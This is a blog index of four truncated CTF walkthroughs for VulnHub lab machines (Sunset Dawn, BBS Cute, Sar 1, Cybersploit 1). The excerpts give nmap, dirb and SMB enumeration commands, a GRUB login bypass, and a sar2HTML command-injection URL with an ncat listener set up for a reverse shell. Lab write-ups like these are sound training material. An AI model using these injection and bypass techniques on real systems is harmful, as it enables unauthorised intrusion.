How to hack into Sunset Dawn from VulnHub

https://www.vulnhub.com/entry/sunset-dawn,341/ System Info: Debian 10. Discover Target IP: `sudo nmap -sn 192.168.122.1-255`. Scan Ports: `nmap -p- 192.168.122.11`, `nmap -p 80,139,445,3306 -sC -sV 192.168.122.11`, `enum4linux -a 192.168.122.11`. Port 80: robots.txt does not exist. Using `dirb http://192.168.122.11` we can find http://192.168.122.11/logs/; we can download management.log from it and take a look. SMB server: port 139 and port 445 indicate that there is an SMB server on the target machine. Use `smbclient -L //dawn` to list all of its services, and we can find the shared disk ITDEPT. We can log into it with `smbclient //dawn/ITDEPT`. Now we are in the SMB share, but it is empty. If we go back to reading that management....

Nov 8, 2022 16:00 · liucreator

How to hack into BBS Cute from VulnHub

https://www.vulnhub.com/entry/bbs-cute-102,567/ Fix VM network: Debian 10, network is broken in QEMU. Launch the VM, edit the GRUB parameters on the line linux ..., change ro to rw, and add init=/bin/bash after it to bypass login. Edit /etc/network/interfaces, change the interface name to ours, and add auto enp1s0. Discover Target IP: `sudo nmap -sn 192.168.122.1-255`. Scan Ports: `nmap -p- 192.168.122.122`, `nmap -p 22,80,88,110,995 -sC -sV 192.168.122.122`. Port 80: this site doesn’t have a robots.txt. Run dirb http://192....

Nov 7, 2022 15:00 · liucreator

How to hack into Sar 1 from VulnHub

https://www.vulnhub.com/entry/sar-1,425/ Discover Target Networks: `sudo nmap -sn 192.168.122.1-255`, `sudo nmap -p- 192.168.122.207`. Port 80: run `dirb http://192.168.122.207` and find http://192.168.122.207/phpinfo.php. Visit http://192.168.122.207/robots.txt and find http://192.168.122.207/sar2HTML/. sar2HTML: version 3.2.1 of sar2HTML is vulnerable to remote code execution using a URL GET request, see https://www.exploit-db.com/exploits/47204. Reverse Shell: we can add any command after `http://192.168.122.207/sar2HTML/index.php?plot=;` to run it; we can try some options from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md. Python: we can check if Python exists on the machine with `http://192.168.122.207/sar2HTML/index.php?plot=;which python3`, then we can run `ncat -nvlp 4444` on the attacker’s machine, and go to http://192....

Nov 4, 2022 20:00 · liucreator

How to hack into Cybersploit 1 from VulnHub

https://www.vulnhub.com/entry/cybersploit-1,506/ It is running Ubuntu 12.04 LTS; use its preset in QEMU. Discover Target IP: `sudo nmap -sn 192.168.122.1-255`. Scan Ports: `nmap -p- 192.168.122.181`, `nmap -p 22,80 -sC -sV 192.168.122.181`, `sudo nmap -sU 192.168.122.181` (scans the top 1000 UDP ports). Port 80: visit http://192.168.122.181/robots.txt, getting R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9. Decoding it from base64, we get Flag 1: Good Work ! Flag1: cybersploit{youtube.com/c/cybersploit}. `dirb http://192.168.122.181`, `nikto -host 192.168.122.181`. If we inspect the source of the home page at view-source:http://192.168.122.181/, we will get a username at line 48 <!...

Nov 3, 2022 14:00 · liucreator